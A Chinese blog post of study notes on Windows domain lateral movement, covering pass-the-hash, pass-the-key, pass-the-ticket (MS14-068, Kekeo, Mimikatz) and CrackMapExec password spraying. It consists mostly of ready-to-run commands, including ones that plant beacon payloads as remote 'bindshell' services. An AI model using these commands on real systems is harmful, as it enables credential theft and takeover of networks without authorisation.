7、内网安全-横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射

这篇具有很好参考价值的文章主要介绍了7、内网安全-横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

用途:个人学习笔记,有所借鉴,欢迎指正

目录

一、域横向移动-PTH-Mimikatz&NTLM

1、Mimikatz

2、impacket-at&ps&wmi&smb

二、域横向移动-PTK-Mimikatz&AES256

三、域横向移动-PTT-漏洞&Kekeo&Ticket

 1、漏洞-MS14068(webadmin权限)——利用漏洞生成的用户的新身份票据尝试认证

2、kekeo(高权限,需NTLM)——自己利用获取的NTLM生成新的票据尝试认证

3、mimikatz(高权限,需Ticket)——利用历史遗留票据重新认证尝试

四、Linux系统+Proxychains+CrackMapExec-密码喷射


一、域横向移动-PTH-Mimikatz&NTLM

PTH=Pass The Hash,通过密码散列值(通常是NTLM Hash)来进行攻击。
在域环境中,用户登录计算机时使用的域账号,计算机会用相同本地管理员账号和密码。
因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方
法登录到内网主机的其他计算机。另外注意在window Server 2012 R2之前使用到的密
码散列值是LM、NTLM,在2012 R2及其版本之后使用到的密码散列值是NTLM Hash。

1、Mimikatz

mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c
net use \\192.168.3.32/c$
copy beacon.exe \\192.168.3.32\c$
sc \\sqlserver create bindshell binpath="c:\4444.exe"
sc \\sqlserver start bindahell

2、impacket-at&ps&wmi&smb

Psexec -hashes :NTLM值 域名/域用户@域内ip地址
smbexec -hashes :NTLM值 域名/域用户@域内ip地址
wmiexec -hashes :NTLM值 域名/域用户@域内ip地址
python psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

二、域横向移动-PTK-Mimikatz&AES256

PTK=Pass The Key,当系统安装了KB2871997补丁且禁用了NTLM的时候,
那我们抓取到的ntlm hash也就失去了作用,但是可以通过PTK的攻击方式获得权限。

mimikatz sekurlsa::ekeys
mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值 

三、域横向移动-PTT-漏洞&Kekeo&Ticket

资源地址:

https://github.com/abatchy17/windowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/kekeo/releases

 1、漏洞-MS14068(webadmin权限)——利用漏洞生成的用户的新身份票据尝试认证

MS14-068是密钥分发中心(KDC)服务中的windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证

注意:成功不成功看DC域控漏洞补丁打没打

获取SID值:shell whoami/user
生成票据文件:shell ms14-068.exe -u webadmin@god.org -s
s-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45
清除票据连接:
shell klist purge
内存导入票据:
mimikatz kerberos:ptc TGT_webadmin@god.org.ccache
连接目标上线:
shell dir \\OWA2010CN-GOD\c$
shell net use \\OWA2010CN-GOD\c$
copy beacon.exe \\OWA2010CN-GOD/c$
sc \\OWA2010CN-GOD create bindshell binpath= "c:\beacon.exe"
sc \\OWA2010CN-GOD start bindshell

2、kekeo(高权限,需NTLM)——自己利用获取的NTLM生成新的票据尝试认证

因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,
我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗
缺点:票据是有有效期的,所以如果当前主机在连接过域控的话,有效期内可利用。

注意:成功率看ntlm哈希值的正确性

生成票据:shell kekeo "tgt::ask /user:Administrator /domain god.org /ntim:ocef208c6485269c20db2cad21734fe7" "exit"
导入票据: shell kekeo "kerberos::pttTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi " "exit"
查看票据:shell klist
利用票据连接:shell dir \\owa2010cn-god\c$

3、mimikatz(高权限,需Ticket)——利用历史遗留票据重新认证尝试

导出票据:
mimikatz sekurlsa::tickets /export

导入票据:
mimikatz kerberos::ptt C:
\Users\webadmin\Desktop\[0;22d3a]-2-1-40e00000-Administrator@krbtgt-god.org.kirbi

shell klist

四、Linux系统+Proxychains+CrackMapExec-密码喷射

CrackMapExec
https://github.com/Porchetta Industries/CrackMapExec
官方手册:https://mpgn.gitbook.io/crackmapexec/
部分案例:https://www.freebuf.com/sectool/184573.html

下载对应release,建立socks连接,设置socks代理,配置规则,调用!
Linux系统代理工具: Proxychains使用
安装使用:
https://blog.csdn.net/qq_53086690/article/details/121779832
代理配置:Proxychains.conf
代理调用:Proxychains 命令                 文章来源地址https://www.toymoban.com/news/detail-826831.html

#域用户HASH登录
proxychains python cme smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c 
#本地用户HASH登录
proxychains python cme smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --1ocal-auth    

到了这里,关于7、内网安全-横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【内网安全】搭建网络拓扑,CS内网横向移动实验

    实验拓扑结构如下: **攻击者win10地址:**192.168.8.3 dmz win7地址: 10.9.75.49 172.16.1.1 **DC server2008地址:**172.16.1.254 CS服务器 kali: 10.9.75.171 1、搭建CS服务器,CS客户端连接 攻击者充当CS客户端连接 开启监听 生成木马 攻击者win10 攻击者访问dmz的Web服务器,上传一句话木马,蚁剑连

    2024年02月03日
    浏览(46)
  • 【内网安全-横向移动】IPC$连接--->计划任务--->上线

    目录 一、信息收集(目标用户密码) 1、简述 1、收集信息充当字典 2、收集方法 二、横向移动 1、ipc$ 2、at命令 3、sc命令: 4、schtasks(计划任务) 三、利用示例 1、流程: 2、示例: 四、工具 1、cs插件---LSTAR - Aggressor 2、impacket-atexec 1、收集信息充当字典 1) 目标字典 :域内网

    2024年01月16日
    浏览(39)
  • 内网安全:WMI协议与SMB协议横向移动

    目录 网络拓扑图 网络环境说明 WMI协议 SMB协议 域内信息收集 WMI协议 - 横向移动 利用方式一:wmic命令 利用方式一:cscript 利用方式一:impacket SMB协议 - 横向移动 利用方式一:psexec 利用方式二:psexec.exe 利用方式三:CS插件 利用方式四:Impacket-smbexec 利用方式五:services 域横

    2024年02月11日
    浏览(52)
  • 【内网安全-横向移动】WMI-WMIC命令&相关内网工具

    目录 一、WMI 1、简述:  1)官方介绍: 2)优点: 3)条件: 4)不足: 5)WMIC管理命令: 6)相关工具:  2、上线: 1、wmic 2、impacket-wmiexec 3、wmicmd.exe 4、WMIHACKER  1)官方介绍: WMI 具有 管理员 和 WMI 提供 程序编写器 使用的多个命令行工具 WMI 命令行工具 - Win32 apps | Micros

    2024年01月22日
    浏览(49)
  • 6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket

      用途:个人学习笔记,有所借鉴,欢迎指正! 在内网环境中,主机192.168.3.31有外网网卡能出网,在取得该主机权限后上线,搭建web应用构造后门下载地址,利用该主机执行相关命令可以进行横向移动,通过传递命令其他主机也可访问下载主机192.168.3.31的后门并执行,从而拿

    2024年02月20日
    浏览(42)
  • 8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS

    用途:个人学习笔记,有所借鉴,欢迎指正 目录 一、域横向移动-RDP-明文NTLM 1.探针服务: 2.探针连接: 3.连接执行: 二、域横向移动-WinRMWinRS-明文NTLM 1.探针可用: 2.连接执行: 3.上线 CSMSF: 4.CS 内置横向移动 三、域横向移动-SpnKerberos-请求破解重写 Kerberoasting攻击的利用:

    2024年02月19日
    浏览(39)
  • 10、内网安全-横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

    用途:个人学习笔记,有所借鉴,欢迎指正! 主要针对内网主机中的 域控提权 漏洞,包含漏洞探针和漏洞复现利用。 1、 横向移动-系统漏洞-CVE-2017-0146(ms17-010,永恒之蓝) 永恒之蓝(CVE-2017-0146)复现(超详细)_永恒之蓝模型-CSDN博客 2、 横向移动-域控提权-CVE-2014-6324 3、

    2024年02月21日
    浏览(35)
  • 内网渗透-内置工具横向移动

    前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。 IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view

    2024年02月09日
    浏览(36)
  • 内网环境横向移动——利用DCOM(2)

    PTH 部分基于 NTLM 认证进行攻击,而 PTT 基于 kerberos 协议进行攻击 PTT 中最常见的三种攻击方式为:MS14-068、黄金票据、白银票据 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该

    2024年01月24日
    浏览(39)
  • 内网渗透之linux到linux横向移动-ssh

    一般情况下SSH密钥存放在~/.ssh/目录下,也可以文件中搜索已保存的SSH凭证 ~/.ssh/config ~/.ssh/known_hosts ~/.bash_history 0x02 环境:THP-csk-lab 1.信息搜集 存活主机 172.16.250.10 172.16.250.30 172.16.250.50 172.16.250端口 22 80 8088 8009 172.16.250.30 端口 22 172.16.250.50 端口 22 2.访问网站进行进一步信息搜集

    2024年02月06日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包